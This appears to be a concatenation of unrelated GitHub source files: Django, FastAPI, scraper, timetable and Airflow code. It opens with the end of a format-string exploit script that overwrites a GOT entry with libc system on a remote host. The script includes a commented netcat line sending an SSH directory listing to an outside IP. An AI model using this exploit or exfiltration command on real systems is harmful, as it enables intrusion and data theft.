    #cPrm = "ls${IFS}-la${IFS}/home/john/.ssh|nc${IFS}10.10.15.144${IFS}8088"
    aPrm = p32(int(got_puts, 16))
    aPrm += p32(int(got_puts, 16) + 2)
    aPrm += "%2553%24" + str(faddr) + "x" # -8
    aPrm += "%2553%24n"
    aPrm += "%2554%24" + str(saddr) + "x"
    aPrm += "%2554%24n"
    payload = cPrm + " " + aPrm
    print " + Executing step " + str(comm) + "..."
    pwn = remote("10.10.10.148", 9999, level = 'error')
    pwn.sendline(payload + "\n")
    recv = pwn.recvall()
    if "not found" in recv:
        print " + Done"
    pwn.shutdown()
    pwn.close()
# Driver: leak the GOT base, derive libc addresses, then run steps 1-2.
print "[*] Connecting to " + host
got_base = mapsExtract()
print " + GOT Base Address = 0x" + got_base
got_printf = hex(int("0x"+got_base, 16) + 0x18)
print "[*] Extracting printf libc addr at: " + got_printf
libc_printf = memExtract()
print " + LIBC printf addr = 0x" + libc_printf
print "[*] Exploiting..."
# 0x13e50 is the printf-to-system offset in the target's libc build
libc_system = hex(int("0x"+libc_printf, 16) - 0x13e50)
print " + LIBC system addr = 0x" + libc_system
got_puts = hex(int("0x"+got_base, 16) + 0x48)
print " + GOT puts addr = 0x" + got_puts
exploitServ(1)
sleep(3)
exploitServ(2)
print "[*] Ready to connect!"
| [
"noreply@github.com"
] | noreply@github.com |
c86e29c92067ee462f7e3e49e7c314b4b5687ea7 | dd7766e4a31c6907ca77c448fe953d7d7e936501 | /account/urls.py | 73aeed4b606ef4c044a21546e84270d00394a5f3 | [] | no_license | Randomnation/blogV2 | 2ece1ad596e4699e63f42eab351837262c2baf5a | 5f7f54bab3fb811cc57b313a608e79329f31eb8c | refs/heads/master | 2021-04-06T11:14:52.398442 | 2018-03-30T02:33:39 | 2018-03-30T02:33:39 | 125,216,311 | 0 | 0 | null | 2021-03-30T04:33:50 | 2018-03-14T13:25:33 | Python | UTF-8 | Python | false | false | 905 | py | from django.urls import path, include
from django.contrib.auth.views import login, logout
from account import views
app_name = "account"
urlpatterns = [
    path('login/', login, {'template_name': 'account/login.html'}, name='login'),
    path('logout/', logout, {'template_name': 'account/logout.html'}, name='logout'),
    path('register/', views.register, name='register'),
    path('login_success/', views.login_success, name='login_success'),
    path('logout_success/', views.logout_success, name='logout_success'),
    path('register_success/', views.register_success, name='register_success'),
    path('not_verified/', views.not_verified, name='not_verified'),
    path('login_next_test/', views.login_next_test, name='login_next_test'),
    # NOTE(review): path() does not interpret regular expressions, so the
    # pattern below matches only the literal text -- this route likely needs
    # django.urls.re_path. Confirm before changing behaviour.
    path('verify/(?P<user>.*)/(?P<code>.*)/', views.verify, name='verify'),
    path('verify/', views.verify, {'code': None, 'user': None}, name='verify')
] | [
"krammtacular@gmail.com"
] | krammtacular@gmail.com |
1f90a89e25da62b6b5d3becb16bd2ca8c3045f98 | c48d431c5b7ac7e242d1637b314dc6e13585724d | /for loop test.py | 283b801b84f3cfc00c5cce761570c8bd1dd254b3 | [] | no_license | tytim12/Test-Res | d5bb5b21a325b84ec1016eb68b0f2bbc058cda2f | 1b43897cb770c12ee59342146599d1a32888150d | refs/heads/master | 2021-09-10T09:30:53.365617 | 2018-03-23T15:41:46 | 2018-03-23T15:41:46 | 119,928,795 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 236 | py | def prime(max):
list = []
for num in range(2,max):
for n in range(2,num):
if num % n == 0:
break
else:
list.append(num)
return list
numList = prime(100)
print(numList) | [
"tanyuan@Dev.chngalaxy.com"
] | tanyuan@Dev.chngalaxy.com |
cd30dee9c2e39d4d74f5da68dd97c87656ac6d03 | ecd27923efba50703a7bfbfa2ba37a8cc78560ea | /automatic_scraper/config/bid/liriqing/shandong_taian_ggzy_config.py | bd234c5293803ff68ced61e5c97669fc19eb8d3a | [] | no_license | yougecn/work | fb691b072a736731083777e489712dee199e6c75 | 1b58525e5ee8a3bdecca87fdee35a80e93d89856 | refs/heads/master | 2022-03-03T19:14:17.234929 | 2018-04-17T12:29:19 | 2018-04-17T12:29:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,631 | py | # coding: utf-8
import time
import logging
import re
logger = logging.getLogger(__name__)
author = "liriqing"
web_title = u"泰安市公共资源交易网"  # Tai'an public resource trading network
data_source = 'http://www.taggzyjy.com.cn'
start_urls = [
    ## Government procurement channels
    # tender announcements
    "http://www.taggzyjy.com.cn/Front/jyxx/075002/075002001/075002001001/",
    "http://www.taggzyjy.com.cn/Front/jyxx/075002/075002001/075002001004/",
    "http://www.taggzyjy.com.cn/Front/jyxx/075002/075002001/075002001005/",
    "http://www.taggzyjy.com.cn/Front/jyxx/075002/075002001/075002001006/",
    "http://www.taggzyjy.com.cn/Front/jyxx/075002/075002001/075002001007/",
    # award announcements
    "http://www.taggzyjy.com.cn/Front/jyxx/075002/075002002/075002002001/",
    "http://www.taggzyjy.com.cn/Front/jyxx/075002/075002002/075002002004/",
    "http://www.taggzyjy.com.cn/Front/jyxx/075002/075002002/075002002005/",
    "http://www.taggzyjy.com.cn/Front/jyxx/075002/075002002/075002002006/",
    "http://www.taggzyjy.com.cn/Front/jyxx/075002/075002002/075002002007/",
    # correction notices
    "http://www.taggzyjy.com.cn/Front/jyxx/075002/075002003/075002003001/",
    "http://www.taggzyjy.com.cn/Front/jyxx/075002/075002003/075002003004/",
    "http://www.taggzyjy.com.cn/Front/jyxx/075002/075002003/075002003005/",
    "http://www.taggzyjy.com.cn/Front/jyxx/075002/075002003/075002003006/",
    "http://www.taggzyjy.com.cn/Front/jyxx/075002/075002003/075002003007/"
]
db_config = {
    'host': '127.0.0.1',
    'port': 3306,
    'user': 'root',
    'password': 'asd123',
    'database': 'bid_data',
    'table': 'zhaotoubiao'
}
# list-page extraction template
index_pattern = {
    "_list": {'pattern': "//tr[@height='30']", 'type': 'xpath', 'target': 'html', 'custom_func_name': ''},
    "_next_page": {'pattern': "//td[text() = '下页 >' and @onclick]", 'type': 'xpath', 'target': 'html', 'custom_func_name': ''},
    "title": {'pattern': "//a[@target='_blank']", 'type': 'xpath', 'target': 'text', 'custom_func_name': ''},
    "issue_time": {'pattern': "//td[@width='80']", 'type': 'xpath', 'target': 'text', 'custom_func_name': ''},
}
# detail-page extraction template
detail_pattern = {
    "sc": {'pattern': "//td[@id='TDContent']/div[1]", 'type': 'xpath', 'target': 'clean_html', 'custom_func_name': ''},
}
def init(item):
    """Executed once at initialisation time: normalise keys and set defaults."""
    logger.info(u'init item: %s', item)
    # expose the configured site title under the key the pipeline expects
    item['_web_title'] = item['web_title']
    del item['web_title']
    item['region']=u'山东-泰安市'
    item['_delay_between_pages'] = 3
def process_list_item(list_element, item):
    """Post-process one list-page row after the ``_list`` template matched.

    Converts the bracketed date string ``[YYYY-MM-DD]`` in
    ``item['issue_time']`` to a unix timestamp and derives
    ``item['bid_type']`` from the channel id embedded in the current start
    URL (075002001 = tender, 075002002 = award, 075002003 = correction).

    :param list_element: html element produced by the ``_list`` template
                         (unused here).
    :param item: mutable item dict, updated in place.
    """
    raw_date = item['issue_time'][1:-1]
    item['issue_time'] = int(time.mktime(time.strptime(raw_date, "%Y-%m-%d")))
    url = item['_current_start_url']
    for channel, bid_type in (('075002001', 1), ('075002002', 0), ('075002003', 2)):
        if channel in url:
            item['bid_type'] = bid_type
            break
    # To stop pagination early, set item['_click_next'] = False here
    # (e.g. once item['_current_page'] reaches a limit).
def process_detail_item(item):
    """Mark whether the detail page yielded content.

    Sets ``item['is_get']`` to 1 when ``item['sc']`` (the cleaned html from
    the detail template) is non-empty, else 0.
    """
    item['is_get'] = 1 if len(item['sc']) > 0 else 0
| [
"iwechen123@gmail.com"
] | iwechen123@gmail.com |
6a754571b917d56a2e08e0f91d054b9346da7e34 | f3bca43b2e703408110cd405e469064442086a32 | /app/Router/ErrorHandling.py | 14b9c9dece1f89033b89ac78f30499bf16655061 | [] | no_license | Simon-whale/FastAPI | 37b40f3fd67d5219db809c73ab7981e6b216d278 | dd22a0a3bad03a6c463bf1b4babd2315d252d0f3 | refs/heads/master | 2023-05-29T16:36:00.894550 | 2021-06-14T18:56:32 | 2021-06-14T18:56:32 | 365,352,991 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 931 | py | from fastapi import APIRouter, HTTPException
from fastapi.responses import JSONResponse
from app.Models.Message import Message
from app.Models.Item import Item
router = APIRouter()
@router.get('/blowsup/{item_no}', tags=["Errors"])
def she_gonna_blow(item_no: int):
    """Demo endpoint: deliberately raises a 404 for ids of 100 or more."""
    if item_no >= 100:
        # Here on purpose we raise an exception if the ID is equal
        # or greater than 100.
        raise HTTPException(status_code=404, detail="Id is not found")
    # Bug fix: the original returned the builtin `id` function object here
    # instead of the requested path parameter.
    return {"It didn't break it": item_no}
@router.get("/break/{item_id}", response_model=Item, responses={404: {"model": Message}}, tags=["Errors"])
def it_go_boom(item_no: int):
"""
This endpoint is showing that you can set a format for the response message and an error message
"""
if item_no == 100:
return {"id": "foo", "value": "It didn't go BOOM"}
else:
return JSONResponse(status_code=404, content={"message": "Item not found"})
| [
"83454878+Simon-whale@users.noreply.github.com"
] | 83454878+Simon-whale@users.noreply.github.com |
ea9fc8459914a36ea8f7d384de549505288b7582 | 7463892195fa479a41dad3029eb55fb5e5dbcaa8 | /Railway/railway_book/views.py | 94ca3dd03c7ebddcf1cc1430ba395476e88f42d9 | [] | no_license | Theskyspace/Monorail-DBMS-investo- | c613af02d822bc69d943aef995e2527d09bfb811 | beee5044ea9da1035f16722effb30d00e18b18db | refs/heads/main | 2023-02-20T13:08:22.828151 | 2021-01-20T04:50:23 | 2021-01-20T04:50:23 | 331,196,240 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,955 | py | from django.shortcuts import render,HttpResponse
from .models import search
file_in = open('search.txt','wt')  # NOTE(review): opened but never used or closed in this module — verify before removing
# Hard-coded monorail departure timetables, one list per station.
# Each entry is a departure time as an 'HHMM' string, in ascending order.
# The *_S lists are consulted for direction 'North' queries in choice() below.
CHEM_S = ['0600', '0622', '0644', '0706', '0728', '0750', '0812', '0834', '0856', '0918', '0940', '1002', '1024', '1046', '1108', '1130', '1152', '1214', '1236', '1258', '1320', '1342', '1404', '1426', '1448', '1510', '1532', '1554', '1616', '1638', '1700', '1722', '1744', '1806', '1828', '1850', '1912', '1934', '1956', '2018', '2040', '2102', '2124', '2146', '2208']
VNP_S = ['0603', '0625', '0647', '0709', '0731', '0753', '0815', '0837', '0859', '0921', '0943', '1005', '1027', '1049', '1111', '1133', '1155', '1217', '1239', '1301', '1323', '1345', '1407', '1429', '1451', '1513', '1535', '1557', '1619', '1641', '1703', '1725', '1747', '1809', '1831', '1853', '1915', '1937', '1959', '2021', '2043', '2105', '2127', '2149', '2211']
FER_S = ['0605', '0627', '0649', '0711', '0733', '0755', '0817', '0839', '0901', '0923', '0945', '1007', '1029', '1051', '1113', '1135', '1157', '1219', '1241', '1303', '1325', '1347', '1409', '1431', '1453', '1515', '1537', '1559', '1621', '1643', '1705', '1727', '1749', '1811', '1833', '1855', '1917', '1939', '2001', '2023', '2045', '2107', '2129', '2151', '2213']
BHARAT_S = ['0606', '0628', '0650', '0712', '0734', '0756', '0818', '0840', '0902', '0924', '0946', '1008', '1030', '1052', '1114', '1136', '1158', '1220', '1242', '1304', '1326', '1348', '1410', '1432', '1454', '1516', '1538', '1600', '1622', '1644', '1706', '1728', '1750', '1812', '1834', '1856', '1918', '1940', '2002', '2024', '2046', '2108', '2130', '2152', '2214']
MYSORE_S = ['0609', '0631', '0653', '0715', '0737', '0759', '0821', '0843', '0905', '0927', '0949', '1011', '1033', '1055', '1117', '1139', '1201', '1223', '1245', '1307', '1329', '1351', '1413', '1435', '1457', '1519', '1541', '1603', '1625', '1647', '1709', '1731', '1753', '1815', '1837', '1859', '1921', '1943', '2005', '2027', '2049', '2111', '2133', '2155', '2217']
BHAKTI_S = ['0614', '0636', '0658', '0720', '0742', '0804', '0826', '0848', '0910', '0932', '0954', '1016', '1038', '1100', '1122', '1144', '1206', '1228', '1250', '1312', '1334', '1356', '1418', '1440', '1502', '1524', '1546', '1608', '1630', '1652', '1714', '1736', '1758', '1820', '1842', '1904', '1926', '1948', '2010', '2032', '2054', '2116', '2138', '2200', '2222']
WADALA_S = ['0617', '0639', '0701', '0723', '0745', '0807', '0829', '0851', '0913', '0935', '0957', '1019', '1041', '1103', '1125', '1147', '1209', '1231', '1253', '1315', '1337', '1359', '1421', '1443', '1505', '1527', '1549', '1611', '1633', '1655', '1717', '1739', '1801', '1823', '1845', '1907', '1929', '1951', '2013', '2035', '2057', '2119', '2141', '2203', '2225']
GTB_S = ['0619', '0641', '0703', '0725', '0747', '0809', '0831', '0853', '0915', '0937', '0959', '1021', '1043', '1105', '1127', '1149', '1211', '1233', '1255', '1317', '1339', '1401', '1423', '1445', '1507', '1529', '1551', '1613', '1635', '1657', '1719', '1741', '1803', '1825', '1847', '1909', '1931', '1953', '2015', '2037', '2059', '2121', '2143', '2205', '2227']
ANTOP_S = ['0621', '0643', '0705', '0727', '0749', '0811', '0833', '0855', '0917', '0939', '1001', '1023', '1045', '1107', '1129', '1151', '1213', '1235', '1257', '1319', '1341', '1403', '1425', '1447', '1509', '1531', '1553', '1615', '1637', '1659', '1721', '1743', '1805', '1827', '1849', '1911', '1933', '1955', '2017', '2039', '2101', '2123', '2145', '2207', '2229']
ACHARYA_S = ['0624', '0646', '0708', '0730', '0752', '0814', '0836', '0858', '0920', '0942', '1004', '1026', '1048', '1110', '1132', '1154', '1216', '1238', '1300', '1322', '1344', '1406', '1428', '1450', '1512', '1534', '1556', '1618', '1640', '1702', '1724', '1746', '1808', '1830', '1852', '1914', '1936', '1958', '2020', '2042', '2104', '2126', '2148', '2210', '2232']
WADALAB_S = ['0629', '0651', '0713', '0735', '0757', '0819', '0841', '0903', '0925', '0947', '1009', '1031', '1053', '1115', '1137', '1159', '1221', '1243', '1305', '1327', '1349', '1411', '1433', '1455', '1517', '1539', '1601', '1623', '1645', '1707', '1729', '1751', '1813', '1835', '1857', '1919', '1941', '2003', '2025', '2047', '2109', '2131', '2153', '2215', '2237']
DADAR_S = ['0631', '0653', '0715', '0737', '0759', '0821', '0843', '0905', '0927', '0949', '1011', '1033', '1055', '1117', '1139', '1201', '1223', '1245', '1307', '1329', '1351', '1413', '1435', '1457', '1519', '1541', '1603', '1625', '1647', '1709', '1731', '1753', '1815', '1837', '1859', '1921', '1943', '2005', '2027', '2049', '2111', '2133', '2155', '2217', '2239']
NAIGAON_S = ['0634', '0656', '0718', '0740', '0802', '0824', '0846', '0908', '0930', '0952', '1014', '1036', '1058', '1120', '1142', '1204', '1226', '1248', '1310', '1332', '1354', '1416', '1438', '1500', '1522', '1544', '1606', '1628', '1650', '1712', '1734', '1756', '1818', '1840', '1902', '1924', '1946', '2008', '2030', '2052', '2114', '2136', '2158', '2220', '2242']
AMBEDKAR_S =['0638', '0700', '0722', '0744', '0806', '0828', '0850', '0912', '0934', '0956', '1018', '1040', '1102', '1124', '1146', '1208', '1230', '1252', '1314', '1336', '1358', '1420', '1442', '1504', '1526', '1548', '1610', '1632', '1654', '1716', '1738', '1800', '1822', '1844', '1906', '1928', '1950', '2012', '2034', '2056', '2118', '2140', '2202', '2224', '2246']
MINT_S = ['0641', '0703', '0725', '0747', '0809', '0831', '0853', '0915', '0937', '0959', '1021', '1043', '1105', '1127', '1149', '1211', '1233', '1255', '1317', '1339', '1401', '1423', '1445', '1507', '1529', '1551', '1613', '1635', '1657', '1719', '1741', '1803', '1825', '1847', '1909', '1931', '1953', '2015', '2037', '2059', '2121', '2143', '2205', '2227', '2249']
LOWER_S = ['0644', '0706', '0728', '0750', '0812', '0834', '0856', '0918', '0940', '1002', '1024', '1046', '1108', '1130', '1152', '1214', '1236', '1258', '1320', '1342', '1404', '1426', '1448', '1510', '1532', '1554', '1616', '1638', '1700', '1722', '1744', '1806', '1828', '1850', '1912', '1934', '1956', '2018', '2040', '2102', '2124', '2146', '2208', '2230', '2252']
SANT_S = ['0646', '0708', '0730', '0752', '0814', '0836', '0858', '0920', '0942', '1004', '1026', '1048', '1110', '1132', '1154', '1216', '1238', '1300', '1322', '1344', '1406', '1428', '1450', '1512', '1534', '1556', '1618', '1640', '1702', '1724', '1746', '1808', '1830', '1852', '1914', '1936', '1958', '2020', '2042', '2104', '2126', '2148', '2210', '2232', '2254']
# The *_N lists are consulted for direction 'South' queries in choice() below.
# NOTE(review): there is no BHAKTI_N list, although choice() originally
# referenced one — confirm whether that station has data in this direction.
CHEM_N = ['0647', '0709', '0731', '0753', '0815', '0837', '0859', '0921', '0943', '1005', '1027', '1049', '1111', '1133', '1155', '1217', '1239', '1301', '1323', '1345', '1407', '1429', '1451', '1513', '1535', '1557', '1619', '1641', '1703', '1725', '1747', '1809', '1831', '1853', '1915', '1937', '1959', '2021', '2043', '2105', '2127', '2149', '2211', '2233', '2255']
VNP_N = ['0644', '0706', '0728', '0750', '0812', '0834', '0856', '0918', '0940', '1002', '1024', '1046', '1108', '1130', '1152', '1214', '1236', '1258', '1320', '1342', '1404', '1426', '1448', '1510', '1532', '1554', '1616', '1638', '1700', '1722', '1744', '1806', '1828', '1850', '1912', '1934', '1956', '2018', '2040', '2102', '2124', '2146', '2208', '2230', '2252']
FER_N = ['0640', '0702', '0724', '0746', '0808', '0830', '0852', '0914', '0936', '0958', '1020', '1042', '1104', '1126', '1148', '1210', '1232', '1254', '1316', '1338', '1400', '1422', '1444', '1506', '1528', '1550', '1612', '1634', '1656', '1718', '1740', '1802', '1824', '1846', '1908', '1930', '1952', '2014', '2036', '2058', '2120', '2142', '2204', '2226', '2248']
MYSORE_N = ['0637', '0659', '0721', '0743', '0805', '0827', '0849', '0911', '0933', '0955', '1017', '1039', '1101', '1123', '1145', '1207', '1229', '1251', '1313', '1335', '1357', '1419', '1441', '1503', '1525', '1547', '1609', '1631', '1653', '1715', '1737', '1759', '1821', '1843', '1905', '1927', '1949', '2011', '2033', '2055', '2117', '2139', '2201', '2223', '2245']
BHARAT_N = ['0634', '0656', '0718', '0740', '0802', '0824', '0846', '0908', '0930', '0952', '1014', '1036', '1058', '1120', '1142', '1204', '1226', '1248', '1310', '1332', '1354', '1416', '1438', '1500', '1522', '1544', '1606', '1628', '1650', '1712', '1734', '1756', '1818', '1840', '1902', '1924', '1946', '2008', '2030', '2052', '2114', '2136', '2158', '2220', '2242']
WADALA_N = ['0627', '0649', '0711', '0733', '0755', '0817', '0839', '0901', '0923', '0945', '1007', '1029', '1051', '1113', '1135', '1157', '1219', '1241', '1303', '1325', '1347', '1409', '1431', '1453', '1515', '1537', '1559', '1621', '1643', '1705', '1727', '1749', '1811', '1833', '1855', '1917', '1939', '2001', '2023', '2045', '2107', '2129', '2151', '2213', '2235']
ANTOP_N = ['0620', '0642', '0704', '0726', '0748', '0810', '0832', '0854', '0916', '0938', '1000', '1022', '1044', '1106', '1128', '1150', '1212', '1234', '1256', '1318', '1340', '1402', '1424', '1446', '1508', '1530', '1552', '1614', '1636', '1658', '1720', '1742', '1804', '1826', '1848', '1910', '1932', '1954', '2016', '2038', '2100', '2122', '2144', '2206', '2228']
GTB_N = ['0623', '0645', '0707', '0729', '0751', '0813', '0835', '0857', '0919', '0941', '1003', '1025', '1047', '1109', '1131', '1153', '1215', '1237', '1259', '1321', '1343', '1405', '1427', '1449', '1511', '1533', '1555', '1617', '1639', '1701', '1723', '1745', '1807', '1829', '1851', '1913', '1935', '1957', '2019', '2041', '2103', '2125', '2147', '2209', '2231']
WADALAB_N = ['0615', '0637', '0659', '0721', '0743', '0805', '0827', '0849', '0911', '0933', '0955', '1017', '1039', '1101', '1123', '1145', '1207', '1229', '1251', '1313', '1335', '1357', '1419', '1441', '1503', '1525', '1547', '1609', '1631', '1653', '1715', '1737', '1759', '1821', '1843', '1905', '1927', '1949', '2011', '2033', '2055', '2117', '2139', '2201', '2223']
AMBEDKAR_N= ['0606', '0628', '0650', '0712', '0734', '0756', '0818', '0840', '0902', '0924', '0946', '1008', '1030', '1052', '1114', '1136', '1158', '1220', '1242', '1304', '1326', '1348', '1410', '1432', '1454', '1516', '1538', '1600', '1622', '1644', '1706', '1728', '1750', '1812', '1834', '1856', '1918', '1940', '2002', '2024', '2046', '2108', '2130', '2152', '2214']
ACHARYA_N = ['0616', '0638', '0700', '0722', '0744', '0806', '0828', '0850', '0912', '0934', '0956', '1018', '1040', '1102', '1124', '1146', '1208', '1230', '1252', '1314', '1336', '1358', '1420', '1442', '1504', '1526', '1548', '1610', '1632', '1654', '1716', '1738', '1800', '1822', '1844', '1906', '1928', '1950', '2012', '2034', '2056', '2118', '2140', '2202', '2224']
DADAR_N = ['0613', '0635', '0657', '0719', '0741', '0803', '0825', '0847', '0909', '0931', '0953', '1015', '1037', '1059', '1121', '1143', '1205', '1227', '1249', '1311', '1333', '1355', '1417', '1439', '1501', '1523', '1545', '1607', '1629', '1651', '1713', '1735', '1757', '1819', '1841', '1903', '1925', '1947', '2009', '2031', '2053', '2115', '2137', '2159', '2221']
NAIGAON_N =['0612', '0634', '0656', '0718', '0740', '0802', '0824', '0846', '0908', '0930', '0952', '1014', '1036', '1058', '1120', '1142', '1204', '1226', '1248', '1310', '1332', '1354', '1416', '1438', '1500', '1522', '1544', '1606', '1628', '1650', '1712', '1734', '1756', '1818', '1840', '1902', '1924', '1946', '2008', '2030', '2052', '2114', '2136', '2158', '2220']
MINT_N = ['0605', '0627', '0649', '0711', '0733', '0755', '0817', '0839', '0901', '0923', '0945', '1007', '1029', '1051', '1113', '1135', '1157', '1219', '1241', '1303', '1325', '1347', '1409', '1431', '1453', '1515', '1537', '1559', '1621', '1643', '1705', '1727', '1749', '1811', '1833', '1855', '1917', '1939', '2001', '2023', '2045', '2107', '2129', '2151', '2213']
LOWER_N = ['0604', '0626', '0648', '0710', '0732', '0754', '0816', '0838', '0900', '0922', '0944', '1006', '1028', '1050', '1112', '1134', '1156', '1218', '1240', '1302', '1324', '1346', '1408', '1430', '1452', '1514', '1536', '1558', '1620', '1642', '1704', '1726', '1748', '1810', '1832', '1854', '1916', '1938', '2000', '2022', '2044', '2106', '2128', '2150', '2212']
SANT_N = ['0600', '0622', '0644', '0706', '0728', '0750', '0812', '0834', '0856', '0918', '0940', '1002', '1024', '1046', '1108', '1130', '1152', '1214', '1236', '1258', '1320', '1342', '1404', '1426', '1448', '1510', '1532', '1554', '1616', '1638', '1700', '1722', '1744', '1806', '1828', '1850', '1912', '1934', '1956', '2018', '2040', '2102', '2124', '2146', '2208']
# Create your views here.
def main(request):
return render(request,'index.html')
def recent(request):
db = search.objects.all()
return render(request,'recent.html',{'search_a':db})
def delete(request):
search.objects.all().delete()
db = search.objects.all()
return render(request,'recent.html',{'search_a':db})
def choice(request):
arrival = request.GET['Arrival']
depart = request.GET['Deparutre']
station = ['CHEMBUR','VNP MARG','FERTILIZER TOWNSHIP','BHARAT PETROLEUM','MYSORE COLONY','BHAKTI PARK','WADALA','GTB NAGAR','ANTOP HILL','ACHARYA ATRE NAGAR','WADALA BRIDGE','DADAR EAST','NAIGAON','AMBEDKAR COLONY','MINT COLONY','LOWER PAREL',"SANT GADGE CHOWK"]
req_time = request.GET['time']
a = None
req_time = req_time.replace(':', '')
direction = None
info = arrival + " TO " + depart + " at " + req_time[0:2] + ":" + req_time[2:4]
db = search.objects.all()
a = search(searches = info).save()
for element in station:
if element == arrival:
direction = 'North'
break
elif element == depart:
direction = 'South'
break
else:
continue
print(arrival,direction,a)
if direction == 'North' and arrival == 'CHEMBUR':
for time in CHEM_S:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'North' and arrival == 'VNP MARG':
for time in VNP_S:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'North' and arrival == 'FERTILIZER TOWNSHIP':
for time in FER_S:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'North' and arrival == 'BHARAT PETROLEUM':
for time in BHARAT_S:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'North' and arrival == 'MYSORE COLONY':
for time in MYSORE_S:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'North' and arrival == 'BHAKTI PARK':
for time in BHAKTI_S:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'North' and arrival == 'WADALA':
for time in WADALA_S:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'North' and arrival == 'GTB NAGAR' :
for time in GTB_S:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'North' and arrival == 'ANTOP HILL':
for time in ANTOP_S:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'North' and arrival == 'ACHARYA ATRE NAGAR':
for time in ACHARYA_S:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'North' and arrival == 'WADALA BRIDGE':
for time in WADALAB_S:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'North' and arrival == 'DADAR EAST':
for time in DADAR_S:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'North' and arrival == 'NAIGAON':
for time in NAIGAON_S:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'North' and arrival == 'AMBEDKAR NAGAR':
for time in AMBEDKAR_S:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'North' and arrival == 'MINT COLONY':
for time in MINT_S:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'North' and arrival == 'LOWER PAREL':
for time in LOWER_S:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'North' and arrival == 'SANT GADGE':
for time in SANT_S:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'South' and arrival == 'CHEMBUR':
for time in CHEM_N:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'South' and arrival == 'VNP MARG':
for time in VNP_N:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'South' and arrival == 'FERTILIZER TOWNSHIP':
for time in FER_N:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'South' and arrival == 'BHARAT PETROLEUM':
for time in BHARAT_N:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'South' and arrival == 'MYSORE COLONY':
for time in MYSORE_N:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'South' and arrival == 'BHAKTI PARK':
for time in BHAKTI_N:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'South' and arrival == 'WADALA':
for time in WADALA_N:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'South' and arrival == 'GTB NAGAR' :
for time in GTB_N:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'South' and arrival == 'ANTOP HILL':
for time in ANTOP_N:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'South' and arrival == 'ACHARYA ATRE NAGAR':
for time in ACHARYA_N:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'South' and arrival == 'WADALA BRIDGE':
for time in WADALAB_N:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'South' and arrival == 'DADAR EAST':
for time in DADAR_N:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'South' and arrival == 'NAIGAON':
for time in NAIGAON_N:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'South' and arrival == 'AMBEDKAR NAGAR':
for time in AMBEDKAR_N:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'South' and arrival == 'MINT COLONY':
for time in MINT_N:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'South' and arrival == 'LOWER PAREL':
for time in LOWER_N:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
elif direction == 'South' and arrival == 'SANT GADGE':
for time in SANT_N:
if int(time) >= int(req_time):
a = time
m = a[3:4]
break
position = ['FROM : ' + str(arrival),'TO : '+ str(depart)]
final_time = [a[0:1],a[1:2],':',a[2:3],a[3:4]]
return render(request,'result.html',{'time':final_time,'position':position})
| [
"akashrockzz411@gmail.com"
] | akashrockzz411@gmail.com |
51b0ecc3f68e0a7f94297a54e5a5c33b9f699b5b | 658e2e3cb8a4d5343a125f7deed19c9ebf06fa68 | /course_DE/udacity-data-engineering-projects-master/Project 5 - Data Pipelines with Airflow/exercises/dags/3_ex3_subdags/subdag.py | 2751def0ecb6a5a10629e528018801bbdaf2210a | [] | no_license | yennanliu/analysis | 3f0018809cdc2403f4fbfe4b245df1ad73fa08a5 | 643ad3fed41961cddd006fadceb0e927f1db1f23 | refs/heads/master | 2021-01-23T21:48:58.572269 | 2020-10-13T22:47:12 | 2020-10-13T22:47:12 | 57,648,676 | 11 | 9 | null | null | null | null | UTF-8 | Python | false | false | 1,649 | py | # Instructions
# In this exercise, we’ll place our S3 to RedShift Copy operations into a SubDag.
# 1 - Consolidate HasRowsOperator into the SubDag
# 2 - Reorder the tasks to take advantage of the SubDag Operators
import datetime
from airflow import DAG
from airflow.operators.postgres_operator import PostgresOperator
from airflow.operators.udacity_plugin import HasRowsOperator
from airflow.operators.udacity_plugin import S3ToRedshiftOperator
import sql_statements.py
# Returns a DAG which creates a table if it does not exist, and then proceeds
# to load data into that table from S3. When the load is complete, a data
# quality check is performed to assert that at least one row of data is
# present.
def get_s3_to_redshift_dag(
parent_dag_name,
task_id,
redshift_conn_id,
aws_credentials_id,
table,
create_sql_stmt,
s3_bucket,
s3_key,
*args, **kwargs):
dag = DAG(
f"{parent_dag_name}.{task_id}",
**kwargs
)
create_task = PostgresOperator(
